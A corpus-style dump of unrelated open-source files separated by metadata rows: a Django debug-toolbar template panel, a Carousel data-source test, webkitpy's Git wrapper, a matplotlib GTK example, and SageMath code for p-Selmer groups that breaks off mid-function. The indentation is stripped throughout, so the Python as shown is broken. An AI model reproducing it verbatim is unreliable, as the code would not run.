from debug_toolbar.panels import DebugPanel
from debug_toolbar.utils.tracking.db import recording, SQLQueryTriggered
# Code taken and adapted from Simon Willison and Django Snippets:
# http://www.djangosnippets.org/snippets/766/
# Monkeypatch instrumented test renderer from django.test.utils - we could use
# django.test.utils.setup_test_environment for this but that would also set up
# e-mail interception, which we don't want
from django.test.utils import instrumented_test_render
from django.template import Template
if not hasattr(Template, '_render'): # Django < 1.2
if Template.render != instrumented_test_render:
Template.original_render = Template.render
Template.render = instrumented_test_render
else:
if Template._render != instrumented_test_render:
Template.original_render = Template._render
Template._render = instrumented_test_render
# MONSTER monkey-patch
old_template_init = Template.__init__
def new_template_init(self, template_string, origin=None, name='<Unknown Template>'):
old_template_init(self, template_string, origin, name)
self.origin = origin
Template.__init__ = new_template_init
class TemplateDebugPanel(DebugPanel):
"""
A panel that lists all templates used during processing of a response.
"""
name = 'Template'
template = 'debug_toolbar/panels/templates.html'
has_content = True
def __init__(self, *args, **kwargs):
super(TemplateDebugPanel, self).__init__(*args, **kwargs)
self.templates = []
template_rendered.connect(self._store_template_info)
def _store_template_info(self, sender, **kwargs):
t = kwargs['template']
if t.name and t.name.startswith('debug_toolbar/'):
return # skip templates that we are generating through the debug toolbar.
context_data = kwargs['context']
context_list = []
for context_layer in context_data.dicts:
temp_layer = {}
if hasattr(context_layer, 'items'):
for key, value in context_layer.items():
# Replace any request elements - they have a large
# unicode representation and the request data is
# already made available from the Request Vars panel.
if isinstance(value, http.HttpRequest):
temp_layer[key] = '<<request>>'
# Replace the debugging sql_queries element. The SQL
# data is already made available from the SQL panel.
elif key == 'sql_queries' and isinstance(value, list):
temp_layer[key] = '<<sql_queries>>'
# Replace LANGUAGES, which is available in i18n context processor
elif key == 'LANGUAGES' and isinstance(value, tuple):
temp_layer[key] = '<<languages>>'
# QuerySet would trigger the database: user can run the query from SQL Panel
elif isinstance(value, QuerySet):
model_name = "%s.%s" % (value.model._meta.app_label, value.model.__name__)
temp_layer[key] = '<<queryset of %s>>' % model_name
else:
try:
recording(False)
pformat(value) # this MAY trigger a db query
except SQLQueryTriggered:
temp_layer[key] = '<<triggers database query>>'
except UnicodeEncodeError:
temp_layer[key] = '<<unicode encode error>>'
else:
temp_layer[key] = value
finally:
recording(True)
try:
context_list.append(pformat(temp_layer))
except UnicodeEncodeError:
pass
kwargs['context'] = context_list
self.templates.append(kwargs)
def nav_title(self):
return _('Templates')
def title(self):
num_templates = len(self.templates)
return _('Templates (%(num_templates)s rendered)') % {'num_templates': num_templates}
def url(self):
return ''
def process_request(self, request):
self.request = request
def process_response(self, request, response):
context_processors = dict(
[
("%s.%s" % (k.__module__, k.__name__),
pformat(k(self.request))) for k in get_standard_processors()
]
)
template_context = []
for template_data in self.templates:
info = {}
# Clean up some info about templates
template = template_data.get('template', None)
if not hasattr(template, 'origin'):
continue
if template.origin and template.origin.name:
template.origin_name = template.origin.name
else:
template.origin_name = 'No origin'
info['template'] = template
# Clean up context for better readability
if getattr(settings, 'DEBUG_TOOLBAR_CONFIG', {}).get('SHOW_TEMPLATE_CONTEXT', True):
context_list = template_data.get('context', [])
info['context'] = '\n'.join(context_list)
template_context.append(info)
self.record_stats({
'templates': template_context,
'template_dirs': [normpath(x) for x in settings.TEMPLATE_DIRS],
'context_processors': context_processors,
})
| agpl-3.0 | 7,098,565,449,596,766,000 | 40.748252 | 98 | 0.587437 | false |
mikofski/Carousel | carousel/tests/test_data.py | 2 | 5322 | """
Test data sources
"""
from nose.tools import ok_, eq_
from carousel.tests import logging
from carousel.core import UREG
from carousel.core.data_sources import DataSource, DataParameter
from carousel.core.data_readers import XLRDReader
from carousel.tests import PROJ_PATH, TESTS_DIR
import os
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.DEBUG)
TUSCON = os.path.join(PROJ_PATH, 'data', 'Tuscon.json')
XLRDREADER_TESTDATA = os.path.join(TESTS_DIR, 'xlrdreader_testdata.xlsx')
def test_datasource_metaclass():
"""
Test data source meta class.
"""
class DataSourceTest1(DataSource):
"""
Test data source with parameters in file.
"""
class Meta:
data_file = 'pvpower.json'
data_path = os.path.join(PROJ_PATH, 'data')
def __prepare_data__(self):
pass
data_test1 = DataSourceTest1(TUSCON)
ok_(isinstance(data_test1, DataSource))
eq_(data_test1.param_file, os.path.join(PROJ_PATH, 'data', 'pvpower.json'))
class DataSourceTest2(DataSource):
"""
Test data source with parameters in code.
"""
latitude = DataParameter(**{
"description": "latitude",
"units": "degrees",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
longitude = DataParameter(**{
"description": "longitude",
"units": "degrees",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
elevation = DataParameter(**{
"description": "altitude of site above sea level",
"units": "meters",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
timestamp_start = DataParameter(**{
"description": "initial timestamp",
"isconstant": True,
"dtype": "datetime"
})
timestamp_count = DataParameter(**{
"description": "number of timesteps",
"isconstant": True,
"dtype": "int"
})
module = DataParameter(**{
"description": "PV module",
"isconstant": True,
"dtype": "str"
})
inverter = DataParameter(**{
"description": "PV inverter",
"isconstant": True,
"dtype": "str"
})
module_database = DataParameter(**{
"description": "module databases",
"isconstant": True,
"dtype": "str"
})
inverter_database = DataParameter(**{
"description": "inverter database",
"isconstant": True,
"dtype": "str"
})
Tamb = DataParameter(**{
"description": "average yearly ambient air temperature",
"units": "degC",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
Uwind = DataParameter(**{
"description": "average yearly wind speed",
"units": "m/s",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
surface_azimuth = DataParameter(**{
"description": "site rotation",
"units": "degrees",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
timezone = DataParameter(**{
"description": "timezone",
"isconstant": True,
"dtype": "str"
})
def __prepare_data__(self):
pass
data_test2 = DataSourceTest2(TUSCON)
ok_(isinstance(data_test2, DataSource))
for k, val in data_test1.parameters.iteritems():
eq_(data_test2.parameters[k], val)
class DataSourceTest4(DataSource):
"""
Test data source with parameters in file.
"""
latitude = DataParameter(**{
"description": "latitude",
"units": "radians",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
class Meta:
data_file = 'pvpower.json'
data_path = os.path.join(PROJ_PATH, 'data')
def __prepare_data__(self):
pass
data_test4 = DataSourceTest4(TUSCON)
ok_(isinstance(data_test4, DataSource))
eq_(data_test4['latitude'].u, UREG.radians)
eq_(data_test4.param_file, os.path.join(PROJ_PATH, 'data', 'pvpower.json'))
def test_xlrdreader_datasource():
"""
Test data source with xlrd reader.
"""
class DataSourceTest3(DataSource):
"""
Test data source with xlrd reader and params in file.
"""
class Meta:
data_reader = XLRDReader
data_file = 'xlrdreader_param.json'
data_path = TESTS_DIR
def __prepare_data__(self):
pass
data_test3 = DataSourceTest3(XLRDREADER_TESTDATA)
ok_(isinstance(data_test3, DataSource))
eq_(data_test3._meta.data_reader, XLRDReader)
os.remove(os.path.join(TESTS_DIR, 'xlrdreader_testdata.xlsx.json'))
LOGGER.debug('xlrdreader_testdata.xlsx.json has been cleaned')
if __name__ == '__main__':
test_datasource_metaclass()
test_xlrdreader_datasource()
| bsd-3-clause | -690,172,727,919,426,300 | 28.403315 | 79 | 0.537204 | false |
smishenk/blink-crosswalk | Tools/Scripts/webkitpy/common/checkout/scm/git.py | 27 | 14958 | # Copyright (c) 2009, 2010, 2011 Google Inc. All rights reserved.
# Copyright (c) 2009 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
import logging
import os
import re
from webkitpy.common.checkout.scm.scm import SCM
from webkitpy.common.memoized import memoized
from webkitpy.common.system.executive import Executive, ScriptError
_log = logging.getLogger(__name__)
class AmbiguousCommitError(Exception):
def __init__(self, num_local_commits, has_working_directory_changes):
Exception.__init__(self, "Found %s local commits and the working directory is %s" % (
num_local_commits, ["clean", "not clean"][has_working_directory_changes]))
self.num_local_commits = num_local_commits
self.has_working_directory_changes = has_working_directory_changes
class Git(SCM):
# Git doesn't appear to document error codes, but seems to return
# 1 or 128, mostly.
ERROR_FILE_IS_MISSING = 128
executable_name = 'git'
def __init__(self, cwd, **kwargs):
SCM.__init__(self, cwd, **kwargs)
def _run_git(self, command_args, **kwargs):
full_command_args = [self.executable_name] + command_args
full_kwargs = kwargs
if not 'cwd' in full_kwargs:
full_kwargs['cwd'] = self.checkout_root
return self._run(full_command_args, **full_kwargs)
@classmethod
def in_working_directory(cls, path, executive=None):
try:
executive = executive or Executive()
return executive.run_command([cls.executable_name, 'rev-parse', '--is-inside-work-tree'], cwd=path, error_handler=Executive.ignore_error).rstrip() == "true"
except OSError, e:
# The Windows bots seem to throw a WindowsError when git isn't installed.
return False
def find_checkout_root(self, path):
# "git rev-parse --show-cdup" would be another way to get to the root
checkout_root = self._run_git(['rev-parse', '--show-toplevel'], cwd=(path or "./")).strip()
if not self._filesystem.isabs(checkout_root): # Sometimes git returns relative paths
checkout_root = self._filesystem.join(path, checkout_root)
return checkout_root
@classmethod
def read_git_config(cls, key, cwd=None, executive=None):
# FIXME: This should probably use cwd=self.checkout_root.
# Pass --get-all for cases where the config has multiple values
# Pass the cwd if provided so that we can handle the case of running webkit-patch outside of the working directory.
# FIXME: This should use an Executive.
executive = executive or Executive()
return executive.run_command([cls.executable_name, "config", "--get-all", key], error_handler=Executive.ignore_error, cwd=cwd).rstrip('\n')
def _discard_local_commits(self):
self._run_git(['reset', '--hard', self._remote_branch_ref()])
def _local_commits(self, ref='HEAD'):
return self._run_git(['log', '--pretty=oneline', ref + '...' + self._remote_branch_ref()]).splitlines()
def _rebase_in_progress(self):
return self._filesystem.exists(self.absolute_path(self._filesystem.join('.git', 'rebase-apply')))
def has_working_directory_changes(self):
return self._run_git(['diff', 'HEAD', '--no-renames', '--name-only']) != ""
def _discard_working_directory_changes(self):
# Could run git clean here too, but that wouldn't match subversion
self._run_git(['reset', 'HEAD', '--hard'])
# Aborting rebase even though this does not match subversion
if self._rebase_in_progress():
self._run_git(['rebase', '--abort'])
def status_command(self):
# git status returns non-zero when there are changes, so we use git diff --name-status HEAD instead.
# No file contents printed, thus utf-8 autodecoding in self.run is fine.
return [self.executable_name, "diff", "--name-status", "--no-renames", "HEAD"]
def _status_regexp(self, expected_types):
return '^(?P<status>[%s])\t(?P<filename>.+)$' % expected_types
def add_list(self, paths, return_exit_code=False, recurse=True):
return self._run_git(["add"] + paths, return_exit_code=return_exit_code)
def delete_list(self, paths):
return self._run_git(["rm", "-f"] + paths)
def move(self, origin, destination):
return self._run_git(["mv", "-f", origin, destination])
def exists(self, path):
return_code = self._run_git(["show", "HEAD:%s" % path], return_exit_code=True, decode_output=False)
return return_code != self.ERROR_FILE_IS_MISSING
def _branch_from_ref(self, ref):
return ref.replace('refs/heads/', '')
def current_branch(self):
return self._branch_from_ref(self._run_git(['symbolic-ref', '-q', 'HEAD']).strip())
def _upstream_branch(self):
current_branch = self.current_branch()
return self._branch_from_ref(self.read_git_config('branch.%s.merge' % current_branch, cwd=self.checkout_root, executive=self._executive).strip())
def _merge_base(self, git_commit=None):
if git_commit:
# Rewrite UPSTREAM to the upstream branch
if 'UPSTREAM' in git_commit:
upstream = self._upstream_branch()
if not upstream:
raise ScriptError(message='No upstream/tracking branch set.')
git_commit = git_commit.replace('UPSTREAM', upstream)
# Special-case <refname>.. to include working copy changes, e.g., 'HEAD....' shows only the diffs from HEAD.
if git_commit.endswith('....'):
return git_commit[:-4]
if '..' not in git_commit:
git_commit = git_commit + "^.." + git_commit
return git_commit
return self._remote_merge_base()
def changed_files(self, git_commit=None):
# FIXME: --diff-filter could be used to avoid the "extract_filenames" step.
status_command = [self.executable_name, 'diff', '-r', '--name-status', "--no-renames", "--no-ext-diff", "--full-index", self._merge_base(git_commit)]
# FIXME: I'm not sure we're returning the same set of files that SVN.changed_files is.
# Added (A), Copied (C), Deleted (D), Modified (M), Renamed (R)
return self._run_status_and_extract_filenames(status_command, self._status_regexp("ADM"))
def _added_files(self):
return self._run_status_and_extract_filenames(self.status_command(), self._status_regexp("A"))
def _deleted_files(self):
return self._run_status_and_extract_filenames(self.status_command(), self._status_regexp("D"))
@staticmethod
def supports_local_commits():
return True
def display_name(self):
return "git"
def most_recent_log_matching(self, grep_str, path):
# We use '--grep=' + foo rather than '--grep', foo because
# git 1.7.0.4 (and earlier) didn't support the separate arg.
return self._run_git(['log', '-1', '--grep=' + grep_str, '--date=iso', self.find_checkout_root(path)])
def svn_revision(self, path):
git_log = self.most_recent_log_matching('git-svn-id:', path)
match = re.search("^\s*git-svn-id:.*@(?P<svn_revision>\d+)\ ", git_log, re.MULTILINE)
if not match:
return ""
return str(match.group('svn_revision'))
def timestamp_of_revision(self, path, revision):
git_log = self.most_recent_log_matching('git-svn-id:.*@%s' % revision, path)
match = re.search("^Date:\s*(\d{4})-(\d{2})-(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$", git_log, re.MULTILINE)
if not match:
return ""
# Manually modify the timezone since Git doesn't have an option to show it in UTC.
# Git also truncates milliseconds but we're going to ignore that for now.
time_with_timezone = datetime.datetime(int(match.group(1)), int(match.group(2)), int(match.group(3)),
int(match.group(4)), int(match.group(5)), int(match.group(6)), 0)
sign = 1 if match.group(7) == '+' else -1
time_without_timezone = time_with_timezone - datetime.timedelta(hours=sign * int(match.group(8)), minutes=int(match.group(9)))
return time_without_timezone.strftime('%Y-%m-%dT%H:%M:%SZ')
def _prepend_svn_revision(self, diff):
revision = self._head_svn_revision()
if not revision:
return diff
return "Subversion Revision: " + revision + '\n' + diff
def create_patch(self, git_commit=None, changed_files=None):
"""Returns a byte array (str()) representing the patch file.
Patch files are effectively binary since they may contain
files of multiple different encodings."""
# Put code changes at the top of the patch and layout tests
# at the bottom, this makes for easier reviewing.
config_path = self._filesystem.dirname(self._filesystem.path_to_module('webkitpy.common.config'))
order_file = self._filesystem.join(config_path, 'orderfile')
order = ""
if self._filesystem.exists(order_file):
order = "-O%s" % order_file
command = [self.executable_name, 'diff', '--binary', '--no-color', "--no-ext-diff", "--full-index", "--no-renames", order, self._merge_base(git_commit), "--"]
if changed_files:
command += changed_files
return self._prepend_svn_revision(self._run(command, decode_output=False, cwd=self.checkout_root))
@memoized
def svn_revision_from_git_commit(self, git_commit):
# git svn find-rev always exits 0, even when the revision or commit is not found.
try:
return int(self._run_git(['svn', 'find-rev', git_commit]).rstrip())
except ValueError, e:
return None
def checkout_branch(self, name):
self._run_git(['checkout', '-q', name])
def create_clean_branch(self, name):
self._run_git(['checkout', '-q', '-b', name, self._remote_branch_ref()])
def blame(self, path):
return self._run_git(['blame', path])
# Git-specific methods:
def _branch_ref_exists(self, branch_ref):
return self._run_git(['show-ref', '--quiet', '--verify', branch_ref], return_exit_code=True) == 0
def delete_branch(self, branch_name):
if self._branch_ref_exists('refs/heads/' + branch_name):
self._run_git(['branch', '-D', branch_name])
def _remote_merge_base(self):
return self._run_git(['merge-base', self._remote_branch_ref(), 'HEAD']).strip()
def _remote_branch_ref(self):
# Use references so that we can avoid collisions, e.g. we don't want to operate on refs/heads/trunk if it exists.
remote_branch_refs = self.read_git_config('svn-remote.svn.fetch', cwd=self.checkout_root, executive=self._executive)
if not remote_branch_refs:
remote_master_ref = 'refs/remotes/origin/master'
if not self._branch_ref_exists(remote_master_ref):
raise ScriptError(message="Can't find a branch to diff against. svn-remote.svn.fetch is not in the git config and %s does not exist" % remote_master_ref)
return remote_master_ref
# FIXME: What's the right behavior when there are multiple svn-remotes listed?
# For now, just use the first one.
first_remote_branch_ref = remote_branch_refs.split('\n')[0]
return first_remote_branch_ref.split(':')[1]
def commit_locally_with_message(self, message, commit_all_working_directory_changes=True):
command = ['commit', '-F', '-']
if commit_all_working_directory_changes:
command.insert(1, '--all')
self._run_git(command, input=message)
# These methods are git specific and are meant to provide support for the Git oriented workflow
# that Blink is moving towards, hence there are no equivalent methods in the SVN class.
def pull(self):
self._run_git(['pull'])
def latest_git_commit(self):
return self._run_git(['log', '-1', '--format=%H']).strip()
def git_commits_since(self, commit):
return self._run_git(['log', commit + '..master', '--format=%H', '--reverse']).split()
def git_commit_detail(self, commit, format=None):
args = ['log', '-1', commit]
if format:
args.append('--format=' + format)
return self._run_git(args)
def _branch_tracking_remote_master(self):
origin_info = self._run_git(['remote', 'show', 'origin', '-n'])
match = re.search("^\s*(?P<branch_name>\S+)\s+merges with remote master$", origin_info, re.MULTILINE)
if not match:
raise ScriptError(message="Unable to find local branch tracking origin/master.")
branch = str(match.group("branch_name"))
return self._branch_from_ref(self._run_git(['rev-parse', '--symbolic-full-name', branch]).strip())
def is_cleanly_tracking_remote_master(self):
if self.has_working_directory_changes():
return False
if self.current_branch() != self._branch_tracking_remote_master():
return False
if len(self._local_commits(self._branch_tracking_remote_master())) > 0:
return False
return True
def ensure_cleanly_tracking_remote_master(self):
self._discard_working_directory_changes()
self._run_git(['checkout', '-q', self._branch_tracking_remote_master()])
self._discard_local_commits()
| bsd-3-clause | 8,745,298,033,427,037,000 | 45.74375 | 169 | 0.641195 | false |
yavalvas/yav_com | build/matplotlib/doc/mpl_examples/user_interfaces/embedding_in_gtk2.py | 9 | 1452 | #!/usr/bin/env python
"""
show how to add a matplotlib FigureCanvasGTK or FigureCanvasGTKAgg widget and
a toolbar to a gtk.Window
"""
import gtk
from matplotlib.figure import Figure
from numpy import arange, sin, pi
# uncomment to select /GTK/GTKAgg/GTKCairo
#from matplotlib.backends.backend_gtk import FigureCanvasGTK as FigureCanvas
from matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas
#from matplotlib.backends.backend_gtkcairo import FigureCanvasGTKCairo as FigureCanvas
# or NavigationToolbar for classic
#from matplotlib.backends.backend_gtk import NavigationToolbar2GTK as NavigationToolbar
from matplotlib.backends.backend_gtkagg import NavigationToolbar2GTKAgg as NavigationToolbar
# implement the default mpl key bindings
from matplotlib.backend_bases import key_press_handler
win = gtk.Window()
win.connect("destroy", lambda x: gtk.main_quit())
win.set_default_size(400,300)
win.set_title("Embedding in GTK")
vbox = gtk.VBox()
win.add(vbox)
fig = Figure(figsize=(5,4), dpi=100)
ax = fig.add_subplot(111)
t = arange(0.0,3.0,0.01)
s = sin(2*pi*t)
ax.plot(t,s)
canvas = FigureCanvas(fig) # a gtk.DrawingArea
vbox.pack_start(canvas)
toolbar = NavigationToolbar(canvas, win)
vbox.pack_start(toolbar, False, False)
def on_key_event(event):
print('you pressed %s'%event.key)
key_press_handler(event, canvas, toolbar)
canvas.mpl_connect('key_press_event', on_key_event)
win.show_all()
gtk.main()
| mit | 1,903,161,130,819,998,200 | 26.923077 | 92 | 0.77686 | false |
JohnCremona/CremonaPacetti | code/KSp.py | 1 | 18244 | # KSp.py: code to compute p-Selmer groups of number fields
#######################################################################
#
# Copyright 2018 John Cremona
#
# This is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this file; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA
#
#######################################################################
#
# This file contains SageMath code to compute K(S,p) where
#
# K is a number field
# S is a finite set of primes of K
# p is a prime number
#
# Author: John Cremona (based on code he wrote for Magma originally)
#
# Note: Sage (as of version 8.2) has methods K.selmer_group(S,m) which
# returns a list of generators of K(S,m) with m>0 not necessarily
# prime, together with (optionally) their orders; and also
# K.selmer_group_iterator(S,m) which returns an iterator through all
# elements of K(S,m). But these functions do not implement any
# inverse map taking an element of K^* representing an element of
# K^*/(K^*)^m lying in K(S,m) and returning a vector of its exponenets
# with respect to the generators. We need this and have implemented
# it here. The code here will be submitted to SageMath through
# https://trac.sagemath.org/ticket/16496.
#
# The main function here is pSelmerGroup(). All the preceding ones
# are subsidiary utilities. Some of these are only to allow the same
# code to work over QQ as over any number field.
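# As a quick illustration (added for clarity, not part of the original
# comments): over K = QQ with S = [2, 3] and p = 2, the group K(S,p) is
# generated by the classes of -1, 2 and 3 modulo squares, so it is a
# 3-dimensional vector space over GF(2).  pSelmerGroup() below computes
# this space together with maps in both directions.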
from sage.all import Matrix, GF, prod, VectorSpace, ProjectiveSpace, QQ, ZZ, Set
def IdealGenerator(I):
r"""Return the generator of a principal ideal.
INPUT:
- ``I`` (fractional ideal or integer) -- either a fractional ideal of a
number field, which must be principal, or a rational integer.
OUTPUT:
A generator of I when I is a principal ideal, else I itself.
"""
try:
return I.gens_reduced()[0]
except AttributeError:
return I
# fractional ideals have no support method, but field elements do
def Support(a):
r"""Return the support (list of prime factors) of a.
INPUT:
- ``a`` (fractional ideal, number field element, or integer) --
either a fractional ideal of a number field, or a nonzero
element of a number field, or a rational integer.
OUTPUT:
The list of prime factors of ``a``. In case ``a`` is a rational
integer this is a list of prime numbers, otherwise a list of prime
ideals.
"""
try:
return a.support()
except AttributeError:
return a.prime_factors()
def coords_in_C_p(I,C,p):
r"""Return coordinates of the ideal ``I`` with respect to a basis of
the ``p``-torsion of the ideal class group ``C``.
INPUT:
- ``I`` (ideal) -- a fractional ideal of a number field ``K``,
whose ``p``'th power is principal.
- ``C`` (class group) -- the ideal class group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
The coordinates of the ideal class `[I]` in the `p`-torsion subgroup `C[p]`.
"""
c = C(I).exponents()
non_p_indices = [i for i,n in enumerate(C.gens_orders()) if not p.divides(n)]
assert all([c[i]==0 for i in non_p_indices])
p_indices = [(i,n//p) for i,n in enumerate(C.gens_orders()) if p.divides(n)]
assert all([c[i]%n==0 for i,n in p_indices])
return [(c[i]//n)%p for i,n in p_indices]
def coords_in_C_mod_p(I,C,p):
r"""Return coordinates of the ideal ``I`` with respect to a basis of
the ``p``-cotorsion of the ideal class group ``C``.
INPUT:
- ``I`` (ideal) -- a fractional ideal of a number field ``K``.
- ``C`` (class group) -- the ideal class group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
The coordinates of the ideal class `[I]` in the `p`-cotorsion group `C/C^p`.
"""
c = C(I).exponents()
p_indices = [i for i,n in enumerate(C.gens_orders()) if p.divides(n)]
return [c[i]%p for i in p_indices]
def root_ideal(I,C,p):
r"""Return the ``p``'th root of an ideal with respect to the class group.
INPUT:
- ``I`` (ideal) -- a fractional ideal of a number field ``K``,
whose ideal class is a ``p``'th power.
- ``C`` (class group) -- the ideal class group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
An ideal `J` such that `J^p` is in the ideal class `[I]`.
"""
v = C(I).exponents()
# In the line below, e=(vi/p)%n should satisfy p*e=vi (mod n)
w = [vi//p if p.divides(n) else (vi/p)%n for vi,n in zip(v,C.gens_orders())]
return prod([J**wi for wi,J in zip(w,C.gens_ideals())], C.number_field().ideal(1))
def coords_in_U_mod_p(u,U,p):
r"""Return coordinates of a unit ``u`` with respect to a basis of the
``p``-cotorsion of the unit group ``U``.
INPUT:
- ``u`` (algebraic unit) -- a unit in a number field ``K``.
- ``U`` (unit group) -- the unit group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
The coordinates of the ideal class `u` in the `p`-cotorsion group `U/U^p`.
"""
co = U.log(u)
if not p.divides(U.zeta_order()):
co = co[1:]
return [c%p for c in co]
def uniquify(S):
r"""
Return a list of the unique elements of S.
"""
return list(Set(S))
def basis_for_p_cokernel(S,C,p):
r"""Return a basis for the group of ideals supported on S (mod
p-powers) whose class in the class group C is a p'th power,
together with a function which takes the S-exponents of such an
ideal and returns its coordinates on this basis.
INPUT:
- ``S`` (list) -- a list of prime ideals in a number field ``K``.
- ``C`` (class group) -- the ideal class group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
(tuple) (``b``, ``f``) where
- ``b`` is a list of ideals which is a basis for the group of
ideals supported on ``S`` (modulo ``p``'th powers) whose ideal
class is a ``p``'th power, and
- ``f`` is a function which takes such an ideal and returns its
coordinates with respect to this basis.
"""
M = Matrix(GF(p),[coords_in_C_mod_p(P,C,p) for P in S])
k = M.left_kernel()
bas = [prod([P**bj.lift() for P,bj in zip(S,b.list())],
C.number_field().ideal(1)) for b in k.basis()]
f = lambda v: k.coordinate_vector(v)
return bas,f
def selmer_group_projective(K,S,p):
r"""Return iterator over K(S,p) up to scaling.
INPUT:
- ``K`` (number field) -- a number field, or ``QQ``.
- ``S`` (list) -- a list of prime ideals in ``K``, or primes.
- ``p`` (prime) -- a prime number.
- ``debug`` (boolean, default ``False``) -- debug flag.
OUTPUT:
(iterator) Yields all non-zero elements of `\mathbb{P}(K(S,p))`,
where `K(S,p)` is viewed as a vector space over `GF(p)`. In other
words, yield all non-zero elements of `K(S,p)` up to scaling.
..note::
This could easily be moved into K.selmer_group_iterator(S,p) as
an option.
"""
KSgens = K.selmer_group(S=uniquify(S), m=p)
for ev in ProjectiveSpace(GF(p),len(KSgens)-1):
yield prod([q ** e for q, e in zip(KSgens, list(ev))], K.one())
# The function itself
def pSelmerGroup(K, S, p, debug=False):
r"""Return the ``p,S``-Selmer group of the number field containing the
ideals in ``S``
INPUT:
- ``K`` (number field) -- a number field, or ``QQ``.
- ``S`` (list) -- a list of prime ideals in ``K``.
- ``p`` (prime) -- a prime number.
- ``debug`` (boolean, default ``False``) -- debug flag.
OUTPUT:
(tuple) ``KSp``, ``KSp_gens``, ``from_KSp``, ``to_KSp`` where
- ``KSp`` is an abstract vector space over `GF(p)` isomorphic to `K(S,p)`;
- ``KSp_gens`` is a list of elements of `K^*` generating `K(S,p)`;
- ``from_KSp`` is a function from ``KSp`` to `K^*` implementing
the isomorphism from `K(S,p)` to `K(S,p)` as a subgroup of
`K^*/(K^*)^p`;
- ``to_KSP`` is a partial function from `K^*` to ``KSp`` defined
on elements `a` whose image in `K^*/(K^*)^p` lies in `K(S,p)`,
mapping them via the inverse isomorphism to the abstract vector
space ``KSp``.
"""
# Input check: p and all P in S must be prime. Remove any repeats in S.
S = uniquify(S)
if not all(P.is_prime() for P in S):
raise ValueError("elements of S must all be prime")
if not p.is_prime():
raise ValueError("p must be prime")
F = GF(p)
# Step 1. The unit contribution: all fundamental units, and also the
# generating root of unity if its order is a multiple of p; we just
# take generators of U/U^p. These have valuation 0 everywhere.
hK = K.class_number()
C = K.class_group()
hKp = (hK%p == 0)
if K == QQ:
if p == 2:
ulist = [QQ(-1)]
else:
ulist = []
else:
U = K.unit_group()
ulist = U.gens_values()
if U.zeta_order()%p:
ulist = ulist[1:]
if debug: print("{} generators in ulist = {}".format(len(ulist),ulist))
# Step 2. The class group contribution: generators of the p'th
# powers of ideals generating the p-torsion in the class group.
# These have valuation divisible by p everywhere.
if hKp:
betalist = [IdealGenerator(c**n) for c,n in zip(C.gens_ideals(), C.gens_orders()) if n%p==0]
else:
betalist = []
if debug: print("{} generators in betalist = {}".format(len(betalist),betalist))
# Step 3. The part depending on S: one generator for each ideal A
# in a basis of those ideals supported on S (modulo p'th powers of
# ideals) which is a p'th power in the class group. We find B
# such that A/B^p is principal and take a generator of that, for
# each A in a generating set.
if hK > 1:
T, f = basis_for_p_cokernel(S,C,p)
alphalist = [IdealGenerator(I/root_ideal(I,C,p)**p) for I in T]
else:
f = lambda x:x
alphalist = [IdealGenerator(P) for P in S]
if debug: print("{} generators in alphalist = {}".format(len(alphalist), alphalist))
# Now we have the generators of K(S,p), and define K(S,p) as an
# abstract vector space:
KSp_gens = alphalist + betalist + ulist
if debug: print("Generators of K(S,p) = {} (dimension {})".format(KSp_gens, len(KSp_gens)))
KSp = VectorSpace(GF(p), len(KSp_gens))
# Now we define maps in each direction from the abstract space and K^*.
# Define the easy map from KSp into K^*:
def from_KSp(v):
return prod([g**vi for g,vi in zip(KSp_gens,v)], K(1))
# Define the hard map from (a subgroup of) K^* to KSp:
def to_KSp(a):
# Check that a is in K(S,p):
assert a != 0
assert all(P in S or a.valuation(P)%p==0 for P in a.support())
# 1. (a) is a p'th power mod ideals in S, say (a)=AB^p, where
# A is supported on S and is a linear combination of the
# ideals T above. Find the exponents of the P_i in S in A:
S_vals = [F(a.valuation(P)) for P in S]
